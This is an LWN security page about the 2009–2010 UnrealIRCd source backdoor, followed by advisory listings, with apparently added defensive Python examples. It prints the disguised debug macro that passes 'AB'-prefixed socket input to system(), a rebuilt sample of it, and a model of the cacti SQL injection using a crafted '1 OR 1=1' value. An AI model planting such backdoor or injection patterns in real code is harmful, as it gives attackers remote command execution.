A backdoor in UnrealIRCd

By Jake Edge
June 16, 2010

The discovery and announcement of a backdoor in UnrealIRCd is embarrassing for the project, and is certainly a real live security vulnerability. But it is hardly the "proof" that Linux is insecure, or less secure than some other (proprietary) OS, as some pundits would have it. The problem is not Linux-specific, nor is it a problem with free software development, it is, instead, something that could happen—has happened—to any software project.

UnrealIRCd is, as its name implies, an Internet Relay Chat (IRC) server. It runs on most platforms, and has added a number of features that some folks find useful in an IRC server. It is not related to the Unreal first-person shooter game as some reported, it is simply a server that can be run to host IRC channels for a wide variety of purposes.

From what the project can tell, around November 10, 2009 the copy of a UnrealIRCd source release on the project's mirrors was replaced with one that contained a backdoor. That backdoor could be used by an attacker to run any command on a system running the compromised server; the command would, obviously, run with the privileges of the user that executed the server. It took until June 12 for the swap to be noticed, so anyone who picked up a copy of the code in that seven-month period may be vulnerable.

The backdoor was disguised to look like a debug statement in the code:

    #ifdef DEBUGMODE3
        /* readbuf holds raw socket input, before any authentication */
        if (!memcmp(readbuf, DEBUGMODE3_INFO, 2))
            DEBUG3_LOG(readbuf);
    #endif

DEBUG3_LOG eventually resolves to a call to system(), while DEBUGMODE3_INFO is just the string "AB". Thus commands sent to the server that start with "AB" are handed off directly to system(). Not a particularly sophisticated backdoor, but an effective one nevertheless. As the advisory points out, even servers that are set up to require passwords from users, or not to allow any users at all, are still vulnerable because they still read input.
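The macro indirection is what makes this easy to miss in a source review: the call site names DEBUG3_LOG, not system(). The scanner below is an added example written for this article, not code from UnrealIRCd or its advisory. It collects the #define lines of a C source, follows each macro's replacement text through any number of further macros, and reports every call site whose callee ends up at system(), popen() or an exec function (direct calls are reported as well). The embedded sample source is constructed: DEBUG3_LOG and DEBUGMODE3_INFO are the names from the article, DEBUG3_EMIT and DEBUG_LOG are invented for the example. It is a line-based heuristic rather than a C preprocessor, so macros spread over continuation lines or built by token pasting are outside what it sees.

```python
import re
from typing import Dict, List, Optional, Set, Tuple

# Calls that hand a string to a shell or exec a program.
SHELL_SINKS = {"system", "popen", "execl", "execlp", "execv", "execvp", "execve"}

# "#define NAME(params) body" or "#define NAME body"; the parameter list must follow
# the name with no space, as C requires for function-like macros.
DEFINE_RE = re.compile(r"^\s*#\s*define\s+([A-Za-z_]\w*)(?:\([^)]*\))?\s*(.*)$")
IDENT_RE = re.compile(r"\b[A-Za-z_]\w*\b")
CALL_RE = re.compile(r"\b([A-Za-z_]\w*)\s*\(")

# Constructed sample modelled on the disguise the article describes. DEBUG3_LOG and
# DEBUGMODE3_INFO are the article's names; DEBUG3_EMIT and the harmless DEBUG_LOG are made up.
SAMPLE_SOURCE = r'''
#define DEBUGMODE3_INFO "AB"
#define DEBUG3_EMIT(x) system(x)
#define DEBUG3_LOG(x) DEBUG3_EMIT(x)
#define DEBUG_LOG(x) fprintf(stderr, "%s\n", x)

#ifdef DEBUGMODE3
	if (!memcmp(readbuf, DEBUGMODE3_INFO, 2))
		DEBUG3_LOG(readbuf);
#endif
	DEBUG_LOG("read ok");
'''


def parse_defines(source: str) -> Dict[str, str]:
    """Map every macro name defined in `source` to its replacement text."""
    defines: Dict[str, str] = {}
    for line in source.splitlines():
        m = DEFINE_RE.match(line)
        if m:
            defines[m.group(1)] = m.group(2)
    return defines


def expansion_chain(name: str, defines: Dict[str, str],
                    seen: Optional[Set[str]] = None) -> List[str]:
    """Follow macro replacements starting at `name`. Returns the chain of names that ends
    at a shell sink, or [] when no expansion reaches one. `seen` stops recursive macros."""
    if name in SHELL_SINKS:
        return [name]
    if seen is None:
        seen = set()
    if name in seen or name not in defines:
        return []
    seen.add(name)
    for ident in IDENT_RE.findall(defines[name]):
        chain = expansion_chain(ident, defines, seen)
        if chain:
            return [name] + chain
    return []


def find_shell_reaching_calls(source: str) -> List[Tuple[int, str, str]]:
    """Report each call site outside #define lines whose callee expands, through any
    number of macros, to a shell sink. A hit is (line number, chain, stripped line)."""
    defines = parse_defines(source)
    hits: List[Tuple[int, str, str]] = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if DEFINE_RE.match(line):
            continue
        for m in CALL_RE.finditer(line):
            chain = expansion_chain(m.group(1), defines)
            if chain:
                hits.append((lineno, " -> ".join(chain), line.strip()))
    return hits


if __name__ == "__main__":
    for lineno, chain, text in find_shell_reaching_calls(SAMPLE_SOURCE):
        print(f"line {lineno}: {text}    [{chain}]")
```

Feeding each file of a source tree to find_shell_reaching_calls and diffing the report against the one for the previous release's tarball is the cheap way to notice a chain like DEBUG3_LOG -> system appearing between two releases; the harmless DEBUG_LOG in the sample is there to show that ordinary logging macros do not trip the check.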

The official Windows binaries were not affected by the backdoor, but there is no reason that they couldn't have been. The problem is that the project didn't provide any means for verifying the integrity of downloads. That allowed the switch to be made and remain undetected for so long. Since then, the project has started signing its code with GPG keys.

The affected code did make it into Gentoo, which issued an update on the 14th. But the fact that "Linux" was "backdoored" brought out the usual suspects among web pundits eager to declare that it was a watershed moment for Linux security. While it certainly was a black eye for UnrealIRCd, it clearly wasn't one for Linux as a whole. First off, UnrealIRCd is installed on very few Linux systems—it can hardly be considered a core Linux program—and even those where it is installed are likely to be running it as a separate user (e.g. ircd) with fairly low privileges.

But, even users with low privileges often have enough to be useful to attackers. One could imagine spammers and botnet herders finding ways to use the network capabilities of a basic Linux user account. The storage on the system might be useful as well. Unless the user is running the server as root, no direct system compromise should be possible, though it is important to note that a local privilege escalation in the kernel could be used to take the system over.

One of the more laughable claims about the flaw was Ed Bott's declaration that Windows virus scanners would have detected the problem had it impacted those binaries. Bott must be under the impression that virus scanners somehow magically recognize backdoors in executable code. The truth, of course, is much more prosaic: some human finds the malware and updates the signatures that the virus scanners use. Unless this exact vulnerability had already been injected into other Windows binaries—and thus a signature created—no virus scanner would pick it up.

There are certainly lessons to be learned here—integrity checking is important for one—but not those that many of the Windows-centric columnists are pushing. Windows is no more (or less) vulnerable than Linux to these kinds of attacks; when attackers can control the code that you run, it is "game over" no matter what OS you run. It is possible that SELinux, TOMOYO, or AppArmor could mitigate this kind of attack to some extent, but it is somewhat unlikely that anyone has (yet) tackled configuring any of those for a fairly obscure IRC server.

It is another reminder that we need to be more vigilant about protecting our code distribution networks. It may be somewhat less common these days—many folks get their new software from distribution repositories—but grabbing a tarball, untarring, and typing:

    ./configure; make; make install

is a longstanding tradition in the open source world. In order to continue that, it would be very helpful to automatically check signatures when downloading, but the mechanism for doing so is, as yet, unclear. For now, though, checking signatures manually, and being very leery of unsigned code, is the prudent course.
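Both the signing remedy the project adopted and the configure/make/install habit come down to a gate that runs before anything is unpacked or built. The following is an added example, not code from UnrealIRCd or from LWN: it checks a downloaded tarball against a SHA-256 digest published out of band and, when a detached signature and the expected signing key's fingerprint are supplied, verifies the signature with gpg and pins it to that key by reading gpg's --status-fd output for a VALIDSIG line. The "tarball" it creates for the demonstration is a constructed temp file with a known digest. gpg is assumed to be installed with the release key already imported; the example does not fetch or import keys.

```python
import hashlib
import hmac
import os
import subprocess
import tempfile
from typing import Optional, Tuple


def sha256_file(path: str) -> str:
    """Hex SHA-256 of a file, read in chunks so a large tarball is not loaded whole."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def digest_matches(path: str, expected_hex: str) -> bool:
    """Compare against a digest obtained out of band (release announcement, project page,
    a signed checksum file), never from the mirror that served the tarball: whoever can
    swap the tarball can swap a checksum file sitting next to it."""
    return hmac.compare_digest(sha256_file(path), expected_hex.strip().lower())


def signature_valid(path: str, sig_path: str, signer_fpr: str) -> bool:
    """Verify a detached OpenPGP signature and pin the signing key. `gpg --verify` exits 0
    for a good signature from *any* key in the keyring, so the machine-readable status
    output is parsed and a VALIDSIG line from the expected fingerprint is required.
    Assumes gpg is installed and the release key has been imported."""
    proc = subprocess.run(
        ["gpg", "--batch", "--status-fd", "1", "--verify", sig_path, path],
        capture_output=True, text=True, check=False)
    want = signer_fpr.replace(" ", "").upper()
    for line in proc.stdout.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0] == "[GNUPG:]" and parts[1] == "VALIDSIG":
            return parts[2].upper() == want
    return False


def verify_release(path: str, expected_sha256: str, sig_path: Optional[str] = None,
                   signer_fpr: Optional[str] = None,
                   allow_unsigned: bool = False) -> Tuple[bool, str]:
    """Gate to run before ./configure; make; make install. Returns (ok, reason).
    Unsigned code is refused unless the caller opts in explicitly."""
    if not digest_matches(path, expected_sha256):
        return False, "digest mismatch: tarball differs from the published release"
    if sig_path is None or signer_fpr is None:
        if allow_unsigned:
            return True, "digest ok, unsigned (explicitly allowed)"
        return False, "no signature"
    if not signature_valid(path, sig_path, signer_fpr):
        return False, "bad or untrusted signature"
    return True, "digest and signature ok"


def make_constructed_sample() -> Tuple[str, str]:
    """Constructed stand-in for a downloaded tarball: a temp file with known contents
    and its known SHA-256 (the digest of the bytes b"hello")."""
    path = os.path.join(tempfile.mkdtemp(), "release.tar.gz")
    with open(path, "wb") as f:
        f.write(b"hello")
    return path, "2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824"


if __name__ == "__main__":
    path, good = make_constructed_sample()
    print(verify_release(path, good, allow_unsigned=True))
    print(verify_release(path, good))
    print(verify_release(path, "00" * 32))
```

The fingerprint pinning is the part naive scripts skip: a signature that gpg reports as good only means "made by some key in your keyring", so both the digest and the fingerprint have to come from somewhere the mirror operator cannot edit. The allow_unsigned flag defaulting to False is the "leery of unsigned code" stance in the article made mechanical.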

Brief items

Quotes of the week

Fundamentally a password is something that can have its value rapidly drop to zero without warning. It doesn't wear out.
-- Russell Coker on password expiration

ENF [Electrical Network Frequency analysis] relies on frequency variations in the electricity supplied by the National Grid. Digital devices such as CCTV recorders, telephone recorders and camcorders that are plugged in to or located near the mains pick up these deviations in the power supply, which are caused by peaks and troughs in demand. Battery-powered devices are not immune to ENF analysis, as grid frequency variations can be induced in their recordings from a distance.
-- The Register reports on a new forensic technique

Linux Trojan Raises Malware Concerns (PCWorld)

PCWorld looks at a backdoor in Unreal IRC, an Internet relay chat platform for Linux. "An announcement on the Unreal IRCd Forums states 'This is very embarrassing... We found out that the Unreal3.2.8.1.tar.gz file on our mirrors has been replaced quite a while ago with a version with a backdoor (trojan) in it. This backdoor allows a person to execute ANY command with the privileges of the user running the ircd. The backdoor can be executed regardless of any user restrictions (so even if you have a passworded server or hub that doesn't allow any users in).'"

New vulnerabilities

cacti: SQL injection

Package(s): cacti    CVE #(s): CVE-2010-2092
Created: June 14, 2010    Updated: June 17, 2010
Description: From the Debian advisory:

Stefan Esser discovered that cacti, a front-end to rrdtool for monitoring systems and services, is not properly validating input passed to the rra_id parameter of the graph.php script. Due to checking the input of $_REQUEST but using $_GET input in a query an unauthenticated attacker is able to perform SQL injections via a crafted rra_id $_GET value and an additional valid rra_id $_POST or $_COOKIE value.
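The advisory describes a check applied to one PHP superglobal and a query built from another. The following is an added example, not cacti's code or anything from the Debian advisory: it models PHP's $_REQUEST merge order in Python (GET, then POST, then COOKIE, with later sources overriding earlier ones; the real order depends on php.ini), shows the vulnerable shape returning the SQL text it would have executed, and puts the hardened form beside it, which validates and uses the same source and binds the value as a query parameter. The graph table, its rows and the sample parameter values are constructed stand-ins.

```python
import sqlite3
from typing import Callable, Dict, List, Optional, Tuple

Params = Dict[str, str]


def php_request(get: Params, post: Params, cookie: Params) -> Params:
    """Model of $_REQUEST under a GET/POST/COOKIE merge order: later sources override
    earlier ones, so a valid POST or COOKIE value shadows a GET value of the same name.
    (Modelled here; the precedence on a real server comes from php.ini.)"""
    merged: Params = {}
    for source in (get, post, cookie):
        merged.update(source)
    return merged


def is_valid_id(value: Optional[str]) -> bool:
    """The kind of check the advisory refers to: a non-empty string of digits."""
    return value is not None and value.isdigit()


def vulnerable_rra_query(get: Params, post: Params, cookie: Params) -> str:
    """Reproduces the flaw: validate rra_id taken from $_REQUEST, then build the query
    from $_GET. Returns the SQL text that would run, so the mismatch is visible
    without executing it."""
    if not is_valid_id(php_request(get, post, cookie).get("rra_id")):
        raise ValueError("invalid rra_id")
    # $_GET['rra_id'] was never checked: a valid POST or COOKIE value satisfied the check.
    return "SELECT name FROM graph WHERE rra_id = " + get["rra_id"]


def fixed_rra_lookup(conn: sqlite3.Connection, get: Params) -> List[Tuple[str]]:
    """Hardened form: validate and use the same source, and bind the value as a parameter
    so the database never sees it as SQL text."""
    rra_id = get.get("rra_id")
    if not is_valid_id(rra_id):
        raise ValueError("invalid rra_id")
    return conn.execute("SELECT name FROM graph WHERE rra_id = ?", (int(rra_id),)).fetchall()


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the table the graph script reads."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE graph (rra_id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO graph VALUES (?, ?)", [(1, "cpu"), (5, "mem")])
    return conn


def rejects(fn: Callable, *args) -> bool:
    """True when fn(*args) refuses its input with ValueError."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    crafted_get = {"rra_id": "1 OR 1=1"}      # constructed: fails the digit check on its own
    valid_post = {"rra_id": "5"}              # constructed: satisfies the $_REQUEST check
    print(vulnerable_rra_query(crafted_get, valid_post, {}))
    print(rejects(fixed_rra_lookup, make_db(), crafted_get))
```

The two functions differ in one line each, which is the whole lesson of the advisory: a validation routine protects only the value that is later used, so the check and the use must read the same variable, and parameter binding makes the query safe even if a later refactor reintroduces the mismatch.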

Gentoo 201401-20 cacti 2014-01-21
Debian DSA-2060-1 cacti 2010-06-13
Mandriva MDVSA-2010:117 cacti 2010-06-16

dhcp: denial of service

Package(s): dhcp    CVE #(s): CVE-2010-2156
Created: June 11, 2010    Updated: June 30, 2010
Description: From the Mandriva advisory:

ISC DHCP 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 allows remote attackers to cause a denial of service (server exit) via a zero-length client ID.

Fedora FEDORA-2010-9479 dhcp 2010-06-03
Fedora FEDORA-2010-10083 dhcp 2010-06-21
Pardus 2010-87 dhcp 2010-06-24
Fedora FEDORA-2010-9433 dhcp 2010-06-03
Mandriva MDVSA-2010:114 dhcp 2010-06-11

emesene: symlink attack

Package(s): emesene    CVE #(s): CVE-2010-2053
Created: June 11, 2010    Updated: June 16, 2010
Description: From the CVE entry:

emesenelib/ in emesene before 1.6.2 allows local users to overwrite arbitrary files via a symlink attack on the emsnpic temporary file.

Fedora FEDORA-2010-9696 emesene 2010-06-08
Fedora FEDORA-2010-9679 emesene 2010-06-08
Fedora FEDORA-2010-9692 emesene 2010-06-08

flash-player: multiple vulnerabilities

Package(s): flash-player    CVE #(s): CVE-2008-4546 CVE-2009-3793 CVE-2010-1297 CVE-2010-2160 CVE-2010-2161 CVE-2010-2162 CVE-2010-2163 CVE-2010-2164 CVE-2010-2165 CVE-2010-2166 CVE-2010-2167 CVE-2010-2169 CVE-2010-2170 CVE-2010-2171 CVE-2010-2172 CVE-2010-2173 CVE-2010-2174 CVE-2010-2175 CVE-2010-2176 CVE-2010-2177 CVE-2010-2178 CVE-2010-2179 CVE-2010-2180 CVE-2010-2181 CVE-2010-2182 CVE-2010-2183 CVE-2010-2184 CVE-2010-2185 CVE-2010-2186 CVE-2010-2187 CVE-2010-2188 CVE-2010-2189
Created: June 11, 2010    Updated: January 21, 2011
Description: From the SUSE advisory:

Adobe Flash Player was updated to fix multiple critical security vulnerabilities which allow an attacker to remotely execute arbitrary code or to cause a denial of service.

Gentoo 201101-09 flash-player 2011-01-21
Gentoo 201009-05 acroread 2010-09-07
openSUSE openSUSE-SU-2010:0573-1 acroread 2010-09-01
SUSE SUSE-SA:2010:037 acroread 2010-09-01
SUSE SUSE-SA:2010:034 flash-player 2010-08-13
openSUSE openSUSE-SU-2010:0502-1 flash-player 2010-08-12
openSUSE openSUSE-SU-2010:0359-1 acroread 2010-07-08
Red Hat RHSA-2010:0464-01 flash-plugin 2010-06-11
MeeGo MeeGo-SA-10:10 flash-plugin 2010-07-07
SuSE SUSE-SA:2010:024 flash-player 2010-06-11
Pardus 2010-83 flashplugin 2010-06-24
Red Hat RHSA-2010:0470-01 flash-plugin 2010-06-14
SuSE SUSE-SR:2010:013 apache2-mod_php5/php5, bytefx-data-mysql/mono, flash-player, fuse, java-1_4_2-ibm, krb5, libcmpiutil/libvirt, libmozhelper-1_0-0/mozilla-xulrunner190, libopenssl-devel, libpng12-0, libpython2_6-1_0, libtheora, memcached, ncpfs, pango, puppet, python, seamonkey, te_ams, texlive 2010-06-14

glibc: denial of service

Package(s): glibc    CVE #(s): CVE-2009-4880 CVE-2009-4881
Created: June 10, 2010    Updated: November 23, 2010
Description: From the Debian advisory:

Maksymilian Arciemowicz discovered that the GNU C library did not correctly handle integer overflows in the strfmon family of functions. If a user or automated system were tricked into processing a specially crafted format string, a remote attacker could crash applications, leading to a denial of service.

Gentoo 201011-01 glibc 2010-11-15
Debian DSA-2058-1 glibc 2010-06-10

moin: cross-site scripting

Package(s): moin    CVE #(s): none listed
Created: June 14, 2010    Updated: June 29, 2010
Description: From the Red Hat bugzilla:

A possible reflected cross-site scripting attack was discovered in Moin. An attacker able to cause a user to follow a specially crafted malicious link may be able to recover session identifiers or exploit browser vulnerabilities, due to a vulnerable template parameter. The upstream bug report links to patches to correct the flaw.

Fedora FEDORA-2010-10550 moin 2010-06-29
Fedora FEDORA-2010-9857 moin 2010-06-14
Fedora FEDORA-2010-9876 moin 2010-06-14

mono: cross-site scripting

Package(s): mono    CVE #(s): CVE-2010-1459
Created: June 15, 2010    Updated: July 26, 2012
Description: From the Pardus advisory:

The default configuration of ASP.NET in Mono before 2.6.4 has a value of FALSE for the EnableViewStateMac property, which allows remote attackers to conduct cross-site scripting (XSS) attacks, as demonstrated by the __VIEWSTATE parameter to 2.0/menu/menu1.aspx in the XSP sample project.

Ubuntu USN-1517-1 mono 2012-07-25
SUSE SUSE-SR:2010:014 OpenOffice_org, apache2-slms, aria2, bogofilter, cifs-mount/samba, clamav, exim, ghostscript-devel, gnutls, krb5, kvirc, lftp, libpython2_6-1_0, libtiff, libvorbis, lxsession, mono-addon-bytefx-data-mysql/bytefx-data-mysql, moodle, openldap2, opera, otrs, popt, postgresql, python-mako, squidGuard, vte, w3m, xmlrpc-c, XFree86/xorg-x11, yast2-webclient 2010-08-02
Fedora FEDORA-2010-10332 xsp 2010-06-24
Pardus 2010-79 mono-web mono-runtime mono-jscript 2010-06-15
Fedora FEDORA-2010-10332 mod_mono 2010-06-24
Fedora FEDORA-2010-10332 mono-basic 2010-06-24
Fedora FEDORA-2010-10332 gtksourceview-sharp 2010-06-24
Fedora FEDORA-2010-10332 libgdiplus 2010-06-24
Fedora FEDORA-2010-10332 mono-tools 2010-06-24
Fedora FEDORA-2010-10332 gnome-sharp 2010-06-24
Fedora FEDORA-2010-10433 mono 2010-06-28
Fedora FEDORA-2010-10332 mono 2010-06-24

openssl: arbitrary code execution

Package(s): openssl    CVE #(s): CVE-2010-0742
Created: June 15, 2010    Updated: June 22, 2010
Description: From the Pardus advisory:

The Cryptographic Message Syntax (CMS) implementation in crypto/cms/cms_asn1.c in OpenSSL before 0.9.8o and 1.x before 1.0.0a does not properly handle structures that contain OriginatorInfo, which allows context-dependent attackers to modify invalid memory locations or conduct double-free attacks, and possibly execute arbitrary code, via unspecified vectors.

Gentoo 201110-01 openssl 2011-10-09
Fedora FEDORA-2010-9639 openssl 2010-06-07
Fedora FEDORA-2010-9421 openssl 2010-06-02
Pardus 2010-77 openssl 2010-06-15
Fedora FEDORA-2010-9574 openssl 2010-06-07

openssl: information leak

Package(s): openssl    CVE #(s): CVE-2010-1633
Created: June 15, 2010    Updated: June 16, 2010
Description: From the CVE entry:

RSA verification recovery in the EVP_PKEY_verify_recover function in OpenSSL 1.x before 1.0.0a, as used by pkeyutl and possibly other applications, returns uninitialized memory upon failure, which might allow context-dependent attackers to bypass intended key requirements or obtain sensitive information via unspecified vectors. NOTE: some of these details are obtained from third party information.

Gentoo 201110-01 openssl 2011-10-09
Fedora FEDORA-2010-9574 openssl 2010-06-07
Fedora FEDORA-2010-9639 openssl 2010-06-07

pcsc-lite: privilege escalation

Package(s): pcsc-lite    CVE #(s): CVE-2010-0407
Created: June 11, 2010    Updated: September 24, 2010
Description: From the Debian advisory:

It was discovered that PCSCD, a daemon to access smart cards, was vulnerable to a buffer overflow allowing a local attacker to elevate his privileges to root.

Mandriva MDVSA-2010:189-1 pcsc-lite 2010-09-24
Mandriva MDVSA-2010:189 pcsc-lite 2010-09-24
SUSE SUSE-SR:2010:017 java-1_4_2-ibm, sudo, libpng, php5, tgt, iscsitarget, aria2, pcsc-lite, tomcat5, tomcat6, lvm2, libvirt, rpm, libtiff, dovecot12 2010-09-21
openSUSE openSUSE-SU-2010:0612-1 pcsc-lite 2010-09-15
SUSE SUSE-SR:2010:015 gpg2, krb5, kvirc, libpcsclite1/pcsc-lite, libpython2_6-1_0, libvorbis, libwebkit, squidGuard, strongswan 2010-08-17
openSUSE openSUSE-SU-2010:0500-1 pcsc-lite 2010-08-12
Ubuntu USN-969-1 pcsc-lite 2010-08-05
CentOS CESA-2010:0533 pcsc-lite 2010-07-15
Fedora FEDORA-2010-10764 pcsc-lite 2010-07-06
Debian DSA-2059-2 pcsc-lite 2010-07-04
Fedora FEDORA-2010-10014 pcsc-lite 2010-06-16
Fedora FEDORA-2010-9995 pcsc-lite 2010-06-16
Red Hat RHSA-2010:0533-01 pcsc-lite 2010-07-14
Debian DSA-2059-1 pcsc-lite 2010-06-10

python: multiple vulnerabilities

Package(s): python    CVE #(s): CVE-2010-1634 CVE-2010-2089 CVE-2008-5983
Created: June 14, 2010    Updated: October 25, 2012
Description: From the CVE entries:

Multiple integer overflows in audioop.c in the audioop module in Python 2.6, 2.7, 3.1, and 3.2 allow context-dependent attackers to cause a denial of service (application crash) via a large fragment, as demonstrated by a call to audioop.lin2lin with a long string in the first argument, leading to a buffer overflow. NOTE: this vulnerability exists because of an incorrect fix for CVE-2008-3143.5. (CVE-2010-1634)

The audioop module in Python 2.7 and 3.2 does not verify the relationships between size arguments and byte string lengths, which allows context-dependent attackers to cause a denial of service (memory corruption and application crash) via crafted arguments, as demonstrated by a call to audioop.reverse with a one-byte string, a different vulnerability than CVE-2010-1634. (CVE-2010-2089)

Untrusted search path vulnerability in the PySys_SetArgv API function in Python 2.6 and earlier, and possibly later versions, prepends an empty string to sys.path when the argv[0] argument does not contain a path separator, which might allow local users to execute arbitrary code via a Trojan horse Python file in the current working directory. (CVE-2008-5983)

Gentoo 201401-04 python 2014-01-07
Ubuntu USN-1613-1 python2.5 2012-10-17
Ubuntu USN-1613-2 python2.4 2012-10-17
Ubuntu USN-1616-1 python3.1 2012-10-24
Ubuntu USN-1596-1 python2.6 2012-10-04
CentOS CESA-2011:0491 python 2011-05-05
Red Hat RHSA-2011:0491-01 python 2011-05-05
SUSE SUSE-SR:2011:002 ed, evince, hplip, libopensc2/opensc, libsmi, libwebkit, perl, python, sssd, sudo, wireshark 2011-01-25
SUSE SUSE-SR:2010:024 clamav, subversion, python, krb5, otrs, moonlight, OpenOffice_org, kdenetwork4, zope, xpdf, gnutls, and opera 2010-12-23
Red Hat RHSA-2011:0027-01 python 2011-01-13
openSUSE openSUSE-SU-2010:1049-1 python 2010-12-13
Fedora FEDORA-2010-13388 python3 2010-08-23
MeeGo MeeGo-SA-10:16 python 2010-08-03
Fedora FEDORA-2010-9652 python 2010-06-07
Fedora FEDORA-2010-9565 python 2010-06-07
Mandriva MDVSA-2010:132 python 2010-07-14
Pardus 2010-76 python 2010-06-15

samba: denial of service

Package(s): samba    CVE #(s): none listed
Created: June 15, 2010    Updated: June 16, 2010
Description: From the Pardus advisory:

The Server Message Block (SMB) protocol, also known as Common Internet File System (CIFS), acts as an application-layer protocol to provide shared access to files, printers and Inter-Process Communication (IPC). It is also a transport for Distributed Computing Environment / Remote Procedure Call (DCE / RPC) operations. After negotiating an SMB communication the client sends a 'Session Setup AndX' packet to negotiate a session in order to be able to connect on a specific share. It is possible to trigger an uninitialized variable read by sending a specific 'Session Setup AndX' query. Successful exploitation of the issue will result in a denial of service.

Pardus 2010-78 samba 2010-06-15

samba: arbitrary code execution

Package(s): samba    CVE #(s): CVE-2010-2063
Created: June 16, 2010    Updated: October 18, 2010
Description: From the Ubuntu advisory:

Jun Mao discovered that Samba did not correctly validate SMB1 packet contents. An unauthenticated remote attacker could send specially crafted network traffic that could execute arbitrary code as the root user.

Gentoo 201206-22 samba 2012-06-24
SUSE SUSE-SU-2012:0348-1 Samba 2012-03-09
rPath rPSA-2010-0066-1 samba 2010-10-17
CentOS CESA-2010:0488 samba 2010-08-16
SUSE SUSE-SR:2010:014 OpenOffice_org, apache2-slms, aria2, bogofilter, cifs-mount/samba, clamav, exim, ghostscript-devel, gnutls, krb5, kvirc, lftp, libpython2_6-1_0, libtiff, libvorbis, lxsession, mono-addon-bytefx-data-mysql/bytefx-data-mysql, moodle, openldap2, opera, otrs, popt, postgresql, python-mako, squidGuard, vte, w3m, xmlrpc-c, XFree86/xorg-x11, yast2-webclient 2010-08-02
Slackware SSA:2010-169-01 samba 2010-06-21
Red Hat RHSA-2010:0488-01 samba 2010-06-16
CentOS CESA-2010:0488 samba 2010-06-19
Mandriva MDVSA-2010:119 samba 2010-06-17
Debian DSA-2061-1 samba 2010-06-16
CentOS CESA-2010:0488 samba 2010-07-21
Pardus 2010-91 samba 2010-06-30
Ubuntu USN-951-1 samba 2010-06-16
SuSE SUSE-SA:2010:025 samba 2010-07-01

sudo: privilege escalation

Package(s): sudo    CVE #(s): CVE-2010-1646
Created: June 15, 2010    Updated: January 25, 2011
Description: From the Pardus advisory:

The secure path feature in env.c in sudo 1.3.1 through 1.6.9p22 and 1.7.0 through 1.7.2p6 does not properly handle an environment that contains multiple PATH variables, which might allow local users to gain privileges via a crafted value of the last PATH variable.

SUSE SUSE-SR:2011:002 ed, evince, hplip, libopensc2/opensc, libsmi, libwebkit, perl, python, sssd, sudo, wireshark 2011-01-25
openSUSE openSUSE-SU-2011:0050-1 sudo 2011-01-19
rPath rPSA-2010-0075-1 sudo 2010-10-27
Gentoo 201009-03 sudo 2010-09-07
Fedora FEDORA-2010-9415 sudo 2010-06-02
CentOS CESA-2010:0475 sudo 2010-06-16
Red Hat RHSA-2010:0475-01 sudo 2010-06-15
Mandriva MDVSA-2010:118 sudo 2010-06-17
Debian DSA-2062-1 sudo 2010-06-17
Fedora FEDORA-2010-9402 sudo 2010-06-02
Pardus 2010-80 sudo 2010-06-15
MeeGo MeeGo-SA-10:06 sudo 2010-07-07
Ubuntu USN-956-1 sudo 2010-06-30
Fedora FEDORA-2010-9417 sudo 2010-06-02

tiff: arbitrary code execution

Package(s): tiff    CVE #(s): none listed
Created: June 15, 2010    Updated: June 16, 2010
Description: From the Pardus advisory:

Multiple integer overflows in the handling of TIFF files may result in a heap buffer overflow. Opening a maliciously crafted TIFF file may lead to an unexpected application termination or arbitrary code execution. These issues are addressed through improved bounds checking. Credit to Kevin Finisterre of for reporting this issue.

Pardus 2010-81 tiff 2010-06-15

unrealircd: multiple vulnerabilities

Package(s): unrealircd    CVE #(s): none listed
Created: June 15, 2010    Updated: June 16, 2010
Description: From the Gentoo advisory:

Multiple vulnerabilities have been reported in UnrealIRCd:

* The vendor reported a buffer overflow in the user authorization code.

* The vendor reported that the distributed source code of UnrealIRCd was compromised and altered to include a system() call that could be called with arbitrary user input.

A remote attacker could exploit these vulnerabilities to cause the execution of arbitrary commands with the privileges of the user running UnrealIRCd, or a Denial of Service condition.

Gentoo 201006-21 unrealircd 2010-06-14

wireshark: multiple vulnerabilities

Package(s): wireshark    CVE #(s): none listed
Created: June 10, 2010    Updated: June 16, 2010
Description: From the wireshark advisory:

The SMB dissector could dereference a NULL pointer. (Bug 4734) Versions affected: 0.99.6 to 1.0.13, 1.2.0 to 1.2.8

J. Oquendo discovered that the ASN.1 BER dissector could overrun the stack. Versions affected: 0.10.13 to 1.0.13, 1.2.0 to 1.2.8

The SMB PIPE dissector could dereference a NULL pointer on some platforms. Versions affected: 0.8.20 to 1.0.13, 1.2.0 to 1.2.8

The SigComp Universal Decompressor Virtual Machine could go into an infinite loop. (Bug 4826) Versions affected: 0.10.7 to 1.0.13, 1.2.0 to 1.2.8

The SigComp Universal Decompressor Virtual Machine could overrun a buffer. (Bug 4837) Versions affected: 0.10.8 to 1.0.13, 1.2.0 to 1.2.8

Mandriva MDVSA-2010:113 wireshark 2010-06-10

Page editor: Jake Edge

Copyright © 2010, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds